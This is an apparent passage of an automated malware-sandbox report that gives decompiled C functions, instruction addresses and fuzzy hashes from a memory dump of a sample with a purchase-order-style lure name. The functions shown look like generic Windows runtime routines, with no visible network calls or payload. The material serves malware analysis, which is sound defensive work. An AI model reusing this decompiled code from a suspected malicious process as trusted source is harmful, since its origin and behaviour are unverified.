                                                                                                                                                                                  0x333551e8
                                                                                                                                                                                  0x33355208
                                                                                                                                                                                  0x3335520c
                                                                                                                                                                                  0x33355211
                                                                                                                                                                                  0x33355218
                                                                                                                                                                                  0x333b056e
                                                                                                                                                                                  0x33355238
                                                                                                                                                                                  0x3335523c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335523c
                                                                                                                                                                                  0x3335521e
                                                                                                                                                                                  0x33355221
                                                                                                                                                                                  0x33355223
                                                                                                                                                                                  0x33355296
                                                                                                                                                                                  0x3335529c
                                                                                                                                                                                  0x3335529e
                                                                                                                                                                                  0x3335522a
                                                                                                                                                                                  0x3335522a
                                                                                                                                                                                  0x33355232
                                                                                                                                                                                  0x33355234
                                                                                                                                                                                  0x33355236
                                                                                                                                                                                  0x33355236
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355234
                                                                                                                                                                                  0x333552a0
                                                                                                                                                                                  0x33355225
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355225
                                                                                                                                                                                  0x333551ea
                                                                                                                                                                                  0x333551ed
                                                                                                                                                                                  0x333551ef
                                                                                                                                                                                  0x33355283
                                                                                                                                                                                  0x33355289
                                                                                                                                                                                  0x3335528b
                                                                                                                                                                                  0x333551fa
                                                                                                                                                                                  0x333551fa
                                                                                                                                                                                  0x333551fd
                                                                                                                                                                                  0x33355202
                                                                                                                                                                                  0x33355204
                                                                                                                                                                                  0x33355206
                                                                                                                                                                                  0x33355206
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355204
                                                                                                                                                                                  0x33355291
                                                                                                                                                                                  0x333551f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333551f5
                                                                                                                                                                                  0x33355156
                                                                                                                                                                                  0x3335515b
                                                                                                                                                                                  0x33355160
                                                                                                                                                                                  0x33355168
                                                                                                                                                                                  0x3335516a
                                                                                                                                                                                  0x3335516f
                                                                                                                                                                                  0x33355171
                                                                                                                                                                                  0x33355171
                                                                                                                                                                                  0x33355175
                                                                                                                                                                                  0x3335517c
                                                                                                                                                                                  0x33355185
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33355187
                                                                                                                                                                                  0x33355187

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 258779400eafaaef30a934c0ec7a0b8ee02f61f07934b964512f7c499706191d
                                                                                                                                                                                  • Instruction ID: 7581423709abdc711c25030d9a514665778b30aa307b36d702ceaf546cb911c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 258779400eafaaef30a934c0ec7a0b8ee02f61f07934b964512f7c499706191d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 355117B5E453199FFB118FA8C880FDDB7B8AF08394F158429E842FB650DB78A9408B51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338F63F Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                  			E3338F63F(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v12;
				char _v16;
				signed short _v20;
				intOrPtr _v24;
				signed char _v28;
				short _v30;
				char _v32;
				signed short _t40;
				intOrPtr _t53;
				signed int _t56;
				void* _t60;
				signed int _t63;
				signed char _t64;
				void* _t73;
				void* _t76;
				intOrPtr _t78;

				_v24 = __ecx;
				_t63 = 0;
				_v32 = 0;
				_v28 = 0;
				_v12 = 0;
				_v16 = 0;
				_t73 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_t76 = 0xc000000d;
					goto L6;
				} else {
					_t40 =  *((intOrPtr*)(__ecx)) + 0x00000038 & 0x0000ffff;
					_v20 = _t40;
					_v8 = _t40 & 0x0000ffff;
					_t78 = E33365D60(_t40 & 0x0000ffff);
					if(_t78 == 0) {
						_t76 = 0xc0000017;
						L7:
						if(_t73 != 0) {
							E33363B90(_t73);
						}
						L9:
						if(_t63 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
						}
						L10:
						E33363B90( &_v32);
						return _t76;
					}
					E33398F40(_t78, 0, _v8);
					_v30 = _v20;
					_v28 = _t78;
					_t76 = E333710D0(0,  &_v32, 0x333211e0);
					if(_t76 < 0) {
						goto L7;
					}
					_t76 = E333710D0(0,  &_v32, _v24);
					if(_t76 < 0) {
						goto L7;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v32);
					_t76 = E33393EE0();
					if(_t76 == 0xc0000023) {
						_t53 =  *0x33445d78; // 0x0
						_t64 = _v12;
						_t56 = L33365D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t53 + 0x140000, _t64);
						_v8 = _t56;
						_push( &_v12);
						_push(_t64);
						_push(_t56);
						_push( &_v16);
						_push( &_v32);
						_t76 = E33393EE0();
						if(_t76 < 0) {
							L18:
							_t63 = _v8;
							goto L7;
						}
						if(_v16 != 1 || _t64 < 1 || (_t64 & 0x00000001) != 0) {
							_t76 = 0xc0000001;
						} else {
							_t60 = E33365D60(_t64);
							_t79 = _t60;
							if(_t60 != 0) {
								_t63 = _v8;
								E333988C0(_t79, _t63, _t64);
								_t76 = E333CCA41(_t73, _t79);
								if(_t76 < 0) {
									goto L7;
								}
								_t76 = 0;
								goto L9;
							}
							_t76 = 0xc0000017;
						}
						goto L18;
					}
					L6:
					if(_t76 >= 0) {
						goto L10;
					}
					goto L7;
				}
			}




















                                                                                                                                                                                  0x3338f64c
                                                                                                                                                                                  0x3338f64f
                                                                                                                                                                                  0x3338f651
                                                                                                                                                                                  0x3338f654
                                                                                                                                                                                  0x3338f657
                                                                                                                                                                                  0x3338f65a
                                                                                                                                                                                  0x3338f65f
                                                                                                                                                                                  0x3338f663
                                                                                                                                                                                  0x333bd917
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338f671
                                                                                                                                                                                  0x3338f678
                                                                                                                                                                                  0x3338f67b
                                                                                                                                                                                  0x3338f682
                                                                                                                                                                                  0x3338f68a
                                                                                                                                                                                  0x3338f68e
                                                                                                                                                                                  0x333bd87e
                                                                                                                                                                                  0x3338f6f6
                                                                                                                                                                                  0x3338f6f8
                                                                                                                                                                                  0x3338f6fb
                                                                                                                                                                                  0x3338f6fb
                                                                                                                                                                                  0x3338f700
                                                                                                                                                                                  0x3338f702
                                                                                                                                                                                  0x333bd92d
                                                                                                                                                                                  0x333bd92d
                                                                                                                                                                                  0x3338f708
                                                                                                                                                                                  0x3338f70c
                                                                                                                                                                                  0x3338f717
                                                                                                                                                                                  0x3338f717
                                                                                                                                                                                  0x3338f699
                                                                                                                                                                                  0x3338f6a4
                                                                                                                                                                                  0x3338f6ab
                                                                                                                                                                                  0x3338f6b9
                                                                                                                                                                                  0x3338f6bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338f6cb
                                                                                                                                                                                  0x3338f6cf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338f6d4
                                                                                                                                                                                  0x3338f6d5
                                                                                                                                                                                  0x3338f6d6
                                                                                                                                                                                  0x3338f6da
                                                                                                                                                                                  0x3338f6de
                                                                                                                                                                                  0x3338f6e4
                                                                                                                                                                                  0x3338f6ec
                                                                                                                                                                                  0x333bd888
                                                                                                                                                                                  0x333bd88d
                                                                                                                                                                                  0x333bd8a0
                                                                                                                                                                                  0x333bd8a8
                                                                                                                                                                                  0x333bd8ab
                                                                                                                                                                                  0x333bd8ac
                                                                                                                                                                                  0x333bd8ad
                                                                                                                                                                                  0x333bd8b1
                                                                                                                                                                                  0x333bd8b5
                                                                                                                                                                                  0x333bd8bb
                                                                                                                                                                                  0x333bd8bf
                                                                                                                                                                                  0x333bd8e2
                                                                                                                                                                                  0x333bd8e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bd8e2
                                                                                                                                                                                  0x333bd8c5
                                                                                                                                                                                  0x333bd910
                                                                                                                                                                                  0x333bd8d1
                                                                                                                                                                                  0x333bd8d2
                                                                                                                                                                                  0x333bd8d7
                                                                                                                                                                                  0x333bd8db
                                                                                                                                                                                  0x333bd8eb
                                                                                                                                                                                  0x333bd8f0
                                                                                                                                                                                  0x333bd8ff
                                                                                                                                                                                  0x333bd903
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bd909
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bd909
                                                                                                                                                                                  0x333bd8dd
                                                                                                                                                                                  0x333bd8dd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bd8c5
                                                                                                                                                                                  0x3338f6f2
                                                                                                                                                                                  0x3338f6f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338f6f4

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3ae773e492546aa4a52be3c58f819cc7181ad276560267ea7a010521f4219b8d
                                                                                                                                                                                  • Instruction ID: 40fd912dfb2daef47f70203f4e57f4af4db463ecd074cb6c63fb0c5a71e14855
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ae773e492546aa4a52be3c58f819cc7181ad276560267ea7a010521f4219b8d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41D6B6D01329AFEB11DF989880AAFB7BCEF04794F158166E900F7610DA35CE0487E0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338A350 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                                                  			E3338A350(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* _t17;
				intOrPtr* _t19;
				signed int _t23;
				void* _t29;
				signed int _t31;
				void* _t37;
				void* _t38;
				signed int _t43;
				signed int _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t52;
				void* _t55;
				intOrPtr _t57;
				signed int _t58;
				void* _t60;

				_t49 = __edx;
				_push(__ecx);
				_push(__ecx);
				_v5 = 0;
				_t55 = L33381CA7(__ecx);
				if(_t55 < 0) {
					L18:
					return _t55;
				}
				_push(_t37);
				_push(_t50);
				L33362330(_t13, 0x33446818);
				E3338C640(_t37, 0, _t49, _t50);
				_t43 =  *0x3344923c; // 0x0
				if(_t43 != 0) {
					_t17 = E33398170(_a4, _t43,  *0x33449240, 0x14, E3334B600);
					_t43 =  *0x3344923c; // 0x0
					_t60 = _t60 + 0x14;
					_t38 = _t17;
				} else {
					_t38 = 0;
				}
				if(_t38 != 0) {
					_t49 = _v5;
					goto L13;
				} else {
					_t46 =  *0x33449244; // 0x0
					if(_t43 != 0) {
						_t23 =  *0x33449240; // 0x0
						if(_t23 + 1 == _t46) {
							goto L5;
						}
						E33381D66(_t46, _t49, 0);
						_t48 =  *0x3344923c; // 0x0
						L12:
						_t31 =  *0x33449240; // 0x0
						_t38 = _t31 * 0x14 + _t48;
						 *0x33449240 = _t31 + 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t50 = _t38;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E33381D66(_t48, _t49, "true");
						_t43 =  *0x3344923c; // 0x0
						_t49 = 1;
						L13:
						_t57 =  *((intOrPtr*)(_t38 + 0x10));
						 *((intOrPtr*)(_t38 + 0x10)) = _a8;
						_t19 = _a12;
						if(_t19 != 0) {
							 *_t19 = _t57;
						}
						if(_t49 != 0) {
							E33398FB0(_t43,  *0x33449240, 0x14, E3334B600);
						}
						_t55 = 0;
						L17:
						E3338C640(_t38, 1, _t49, _t50);
						E333624D0(0x33446818);
						goto L18;
					}
					L5:
					if(_t46 != 0) {
						_t58 = _t46 + _t46;
					} else {
						_t58 = 0x10;
					}
					if(_t58 < _t46 || _t58 >= 0xccccccc) {
						L29:
						_t55 = 0xc0000017;
						goto L17;
					} else {
						_t47 = _t58 * 0x14;
						_t38 = E3338C958(_t58 * 0x14);
						_v12 = _t38;
						if(_t38 == 0) {
							goto L29;
						}
						E33381D66(_t47, _t49, 0);
						_t52 =  *0x3344923c; // 0x0
						if(_t52 != 0) {
							E333988C0(_t38, _t52,  *0x33449240 * 0x14);
							_t60 = _t60 + 0xc;
							_t29 = E33370130();
							_push(_t52);
							_push(0);
							if(_t29 != 0) {
								_push( *0x3344921c);
							} else {
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							}
							E33363BC0();
						}
						_t48 = _v12;
						 *0x3344923c = _t38;
						 *0x33449244 = _t58;
						goto L12;
					}
				}
			}
























                                                                                                                                                                                  0x3338a350
                                                                                                                                                                                  0x3338a355
                                                                                                                                                                                  0x3338a356
                                                                                                                                                                                  0x3338a358
                                                                                                                                                                                  0x3338a361
                                                                                                                                                                                  0x3338a365
                                                                                                                                                                                  0x3338a46d
                                                                                                                                                                                  0x3338a471
                                                                                                                                                                                  0x3338a471
                                                                                                                                                                                  0x3338a36b
                                                                                                                                                                                  0x3338a36c
                                                                                                                                                                                  0x3338a372
                                                                                                                                                                                  0x3338a379
                                                                                                                                                                                  0x3338a37e
                                                                                                                                                                                  0x3338a386
                                                                                                                                                                                  0x333c6413
                                                                                                                                                                                  0x333c6418
                                                                                                                                                                                  0x333c641e
                                                                                                                                                                                  0x333c6421
                                                                                                                                                                                  0x3338a38c
                                                                                                                                                                                  0x3338a38c
                                                                                                                                                                                  0x3338a38c
                                                                                                                                                                                  0x3338a390
                                                                                                                                                                                  0x3338a474
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338a396
                                                                                                                                                                                  0x3338a398
                                                                                                                                                                                  0x3338a39e
                                                                                                                                                                                  0x333c6428
                                                                                                                                                                                  0x333c6430
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c6438
                                                                                                                                                                                  0x333c643d
                                                                                                                                                                                  0x3338a3fc
                                                                                                                                                                                  0x3338a3fc
                                                                                                                                                                                  0x3338a409
                                                                                                                                                                                  0x3338a40c
                                                                                                                                                                                  0x3338a415
                                                                                                                                                                                  0x3338a416
                                                                                                                                                                                  0x3338a417
                                                                                                                                                                                  0x3338a418
                                                                                                                                                                                  0x3338a419
                                                                                                                                                                                  0x3338a41a
                                                                                                                                                                                  0x3338a41c
                                                                                                                                                                                  0x3338a41d
                                                                                                                                                                                  0x3338a41e
                                                                                                                                                                                  0x3338a41f
                                                                                                                                                                                  0x3338a420
                                                                                                                                                                                  0x3338a425
                                                                                                                                                                                  0x3338a42b
                                                                                                                                                                                  0x3338a42d
                                                                                                                                                                                  0x3338a430
                                                                                                                                                                                  0x3338a433
                                                                                                                                                                                  0x3338a436
                                                                                                                                                                                  0x3338a43b
                                                                                                                                                                                  0x3338a479
                                                                                                                                                                                  0x3338a479
                                                                                                                                                                                  0x3338a43f
                                                                                                                                                                                  0x3338a44f
                                                                                                                                                                                  0x3338a454
                                                                                                                                                                                  0x3338a457
                                                                                                                                                                                  0x3338a459
                                                                                                                                                                                  0x3338a45c
                                                                                                                                                                                  0x3338a466
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338a46c
                                                                                                                                                                                  0x3338a3a4
                                                                                                                                                                                  0x3338a3a6
                                                                                                                                                                                  0x333c6448
                                                                                                                                                                                  0x3338a3ac
                                                                                                                                                                                  0x3338a3ae
                                                                                                                                                                                  0x3338a3ae
                                                                                                                                                                                  0x3338a3b1
                                                                                                                                                                                  0x333c6489
                                                                                                                                                                                  0x333c6489
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338a3c3
                                                                                                                                                                                  0x3338a3c3
                                                                                                                                                                                  0x3338a3cb
                                                                                                                                                                                  0x3338a3cd
                                                                                                                                                                                  0x3338a3d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338a3da
                                                                                                                                                                                  0x3338a3df
                                                                                                                                                                                  0x3338a3e7
                                                                                                                                                                                  0x333c645a
                                                                                                                                                                                  0x333c645f
                                                                                                                                                                                  0x333c6462
                                                                                                                                                                                  0x333c6467
                                                                                                                                                                                  0x333c6468
                                                                                                                                                                                  0x333c646c
                                                                                                                                                                                  0x333c6479
                                                                                                                                                                                  0x333c646e
                                                                                                                                                                                  0x333c6474
                                                                                                                                                                                  0x333c6474
                                                                                                                                                                                  0x333c647f
                                                                                                                                                                                  0x333c647f
                                                                                                                                                                                  0x3338a3ed
                                                                                                                                                                                  0x3338a3f0
                                                                                                                                                                                  0x3338a3f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338a3f6
                                                                                                                                                                                  0x3338a3b1

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5db07a6e1943856b43d55fcb67edbfe6c092685bcb53a0dd0a3740bcda1d5dcd
                                                                                                                                                                                  • Instruction ID: 11682d9c4aa0383713ceeed44d6c19c55718330dc635c6791eba8580dee4723d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5db07a6e1943856b43d55fcb67edbfe6c092685bcb53a0dd0a3740bcda1d5dcd
                                                                                                                                                                                  • Instruction Fuzzy Hash: D341AD75E883419BEB14EF68C8C1B9A77E8FB44348F05883DE941BF241DBA1D8458790
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33423157 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                                  			E33423157(void* __ebx, intOrPtr __ecx, signed short* __edx, void* __edi, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				char _v16;
				char _v32;
				char _v40;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t74;
				intOrPtr* _t77;
				intOrPtr _t82;
				char _t84;
				void* _t87;
				intOrPtr _t88;
				void* _t92;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t101;
				void* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				signed short* _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t110;
				intOrPtr* _t113;
				intOrPtr* _t116;
				intOrPtr* _t117;
				intOrPtr _t119;
				void* _t120;
				void* _t124;

				_t105 = __edx;
				_t100 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t63 = __ecx;
				_v8 = __edx;
				_t110 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t63 + 0x154; // 0x154
				_t116 = _t3;
				_t97 =  *_t116;
				_t4 = _t110 + 2; // 0x2
				_t64 = _t4;
				while(_t97 != _t116) {
					if( *((intOrPtr*)(_t97 + 0x14)) != _t64) {
						L4:
						_t97 =  *_t97;
						continue;
					} else {
						_t7 = _t97 + 0x18; // 0x18
						if(E333A8050(_t7, _t105[2], _t110) == _t110) {
							_t40 = _t97 + 0xc; // 0xc
							_t117 = _t40;
							_t113 =  *_t117;
							while(_t113 != _t117) {
								_t41 = _t113 + 8; // 0x8
								_t92 = E33398870(_a4, _t41, 0x10);
								_t124 = _t124 + 0xc;
								if(_t92 == 0) {
									L12:
									L13:
									return 0;
								} else {
									_t113 =  *_t113;
									continue;
								}
								goto L27;
							}
							_t104 = L33365D90(_t100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t104 != 0) {
								_t119 = _a4;
								_t46 = _t97 + 0xc; // 0xc
								_t95 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t108 =  *_t95;
								if( *((intOrPtr*)(_t108 + 4)) != _t95) {
									L22:
									_t102 = 3;
									asm("int 0x29");
									_push(_t119);
									_t120 = _t102;
									E333FA810(3,  &_v32,  &_v40);
									_t82 = L33365D90(_t102,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									 *((intOrPtr*)(_t120 + 0x134)) = _t82;
									if(_t82 != 0) {
										_t84 =  *((intOrPtr*)(_t120 + 0x8c)) +  *((intOrPtr*)(_t120 + 0x8c));
										_push(4);
										_push(0x1000);
										 *((intOrPtr*)(_t120 + 0x13c)) = _t84;
										_v16 = _t84;
										_push( &_v16);
										_push(0);
										_t62 = _t120 + 0x138; // 0x13b
										_push(0xffffffff);
										_t87 = E33392B10();
									} else {
										_t87 = 0xc0000017;
									}
									return _t87;
								} else {
									 *((intOrPtr*)(_t104 + 4)) = _t95;
									 *_t104 = _t108;
									 *((intOrPtr*)(_t108 + 4)) = _t104;
									 *_t95 = _t104;
									 *((intOrPtr*)(_t97 + 8)) =  *((intOrPtr*)(_t97 + 8)) + 1;
									_t88 = _v12;
									L11:
									 *(_t88 + 0xdc) =  *(_t88 + 0xdc) | 0x00000010;
									goto L12;
								}
							} else {
								L19:
								_push(0xe);
								_pop(0);
								goto L13;
							}
						} else {
							_t105 = _v8;
							_t9 = _t110 + 2; // 0x2
							_t64 = _t9;
							goto L4;
						}
					}
					L27:
				}
				_t10 = _t110 + 0x1a; // 0x1a
				_t99 = L33365D90(_t100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t99 == 0) {
					goto L19;
				} else {
					_t12 = _t110 + 2; // 0x2
					 *((intOrPtr*)(_t99 + 0x14)) = _t12;
					_t16 = _t99 + 0x18; // 0x18
					E333988C0(_t16, _v8[2], _t110);
					_t124 = _t124 + 0xc;
					 *((short*)(_t99 + _t110 + 0x18)) = 0;
					_t19 = _t99 + 0xc; // 0xc
					_t74 = _t19;
					 *((intOrPtr*)(_t74 + 4)) = _t74;
					 *_t74 = _t74;
					 *(_t99 + 8) =  *(_t99 + 8) & 0x00000000;
					_t101 = L33365D90(_t100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t101 == 0) {
						goto L19;
					} else {
						_t119 = _a4;
						_t26 = _t99 + 0xc; // 0xc
						_t77 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t106 =  *_t77;
						if( *((intOrPtr*)(_t106 + 4)) != _t77) {
							goto L22;
						} else {
							 *((intOrPtr*)(_t101 + 4)) = _t77;
							 *_t101 = _t106;
							 *((intOrPtr*)(_t106 + 4)) = _t101;
							 *_t77 = _t101;
							_t88 = _v12;
							 *(_t99 + 8) = 1;
							 *(_t88 + 0xdc) =  *(_t88 + 0xdc) | 0x00000010;
							_t34 = _t88 + 0x154; // 0x1ba
							_t103 = _t34;
							_t107 =  *_t103;
							if( *((intOrPtr*)(_t107 + 4)) != _t103) {
								goto L22;
							} else {
								 *_t99 = _t107;
								 *((intOrPtr*)(_t99 + 4)) = _t103;
								 *((intOrPtr*)(_t107 + 4)) = _t99;
								 *_t103 = _t99;
								goto L11;
							}
						}
					}
				}
				goto L27;
			}



































                                                                                                                                                                                  0x33423157
                                                                                                                                                                                  0x33423157
                                                                                                                                                                                  0x3342315c
                                                                                                                                                                                  0x3342315d
                                                                                                                                                                                  0x33423160
                                                                                                                                                                                  0x33423162
                                                                                                                                                                                  0x33423166
                                                                                                                                                                                  0x33423169
                                                                                                                                                                                  0x3342316c
                                                                                                                                                                                  0x3342316c
                                                                                                                                                                                  0x33423172
                                                                                                                                                                                  0x33423174
                                                                                                                                                                                  0x33423174
                                                                                                                                                                                  0x3342319b
                                                                                                                                                                                  0x3342317c
                                                                                                                                                                                  0x33423199
                                                                                                                                                                                  0x33423199
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342317e
                                                                                                                                                                                  0x33423182
                                                                                                                                                                                  0x3342318d
                                                                                                                                                                                  0x3342325f
                                                                                                                                                                                  0x3342325f
                                                                                                                                                                                  0x33423262
                                                                                                                                                                                  0x3342327d
                                                                                                                                                                                  0x33423268
                                                                                                                                                                                  0x3342326f
                                                                                                                                                                                  0x33423274
                                                                                                                                                                                  0x33423279
                                                                                                                                                                                  0x33423256
                                                                                                                                                                                  0x33423258
                                                                                                                                                                                  0x3342325c
                                                                                                                                                                                  0x3342327b
                                                                                                                                                                                  0x3342327b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342327b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33423279
                                                                                                                                                                                  0x33423293
                                                                                                                                                                                  0x33423297
                                                                                                                                                                                  0x3342329e
                                                                                                                                                                                  0x334232a4
                                                                                                                                                                                  0x334232a4
                                                                                                                                                                                  0x334232a7
                                                                                                                                                                                  0x334232a8
                                                                                                                                                                                  0x334232a9
                                                                                                                                                                                  0x334232aa
                                                                                                                                                                                  0x334232ab
                                                                                                                                                                                  0x334232b0
                                                                                                                                                                                  0x334232c4
                                                                                                                                                                                  0x334232c6
                                                                                                                                                                                  0x334232c7
                                                                                                                                                                                  0x334232d1
                                                                                                                                                                                  0x334232d5
                                                                                                                                                                                  0x334232de
                                                                                                                                                                                  0x334232f1
                                                                                                                                                                                  0x334232f6
                                                                                                                                                                                  0x334232fe
                                                                                                                                                                                  0x3342330d
                                                                                                                                                                                  0x3342330f
                                                                                                                                                                                  0x33423311
                                                                                                                                                                                  0x33423316
                                                                                                                                                                                  0x3342331c
                                                                                                                                                                                  0x33423322
                                                                                                                                                                                  0x33423323
                                                                                                                                                                                  0x33423325
                                                                                                                                                                                  0x3342332c
                                                                                                                                                                                  0x3342332e
                                                                                                                                                                                  0x33423300
                                                                                                                                                                                  0x33423300
                                                                                                                                                                                  0x33423300
                                                                                                                                                                                  0x33423335
                                                                                                                                                                                  0x334232b2
                                                                                                                                                                                  0x334232b2
                                                                                                                                                                                  0x334232b5
                                                                                                                                                                                  0x334232b7
                                                                                                                                                                                  0x334232ba
                                                                                                                                                                                  0x334232bc
                                                                                                                                                                                  0x334232bf
                                                                                                                                                                                  0x3342324f
                                                                                                                                                                                  0x3342324f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342324f
                                                                                                                                                                                  0x33423299
                                                                                                                                                                                  0x33423299
                                                                                                                                                                                  0x33423299
                                                                                                                                                                                  0x3342329b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342329b
                                                                                                                                                                                  0x33423193
                                                                                                                                                                                  0x33423193
                                                                                                                                                                                  0x33423196
                                                                                                                                                                                  0x33423196
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33423196
                                                                                                                                                                                  0x3342318d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342317c
                                                                                                                                                                                  0x3342319f
                                                                                                                                                                                  0x334231b3
                                                                                                                                                                                  0x334231b7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334231bd
                                                                                                                                                                                  0x334231bd
                                                                                                                                                                                  0x334231c0
                                                                                                                                                                                  0x334231ca
                                                                                                                                                                                  0x334231ce
                                                                                                                                                                                  0x334231d5
                                                                                                                                                                                  0x334231d8
                                                                                                                                                                                  0x334231dd
                                                                                                                                                                                  0x334231dd
                                                                                                                                                                                  0x334231e0
                                                                                                                                                                                  0x334231e3
                                                                                                                                                                                  0x334231eb
                                                                                                                                                                                  0x334231fb
                                                                                                                                                                                  0x334231ff
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33423205
                                                                                                                                                                                  0x33423205
                                                                                                                                                                                  0x3342320b
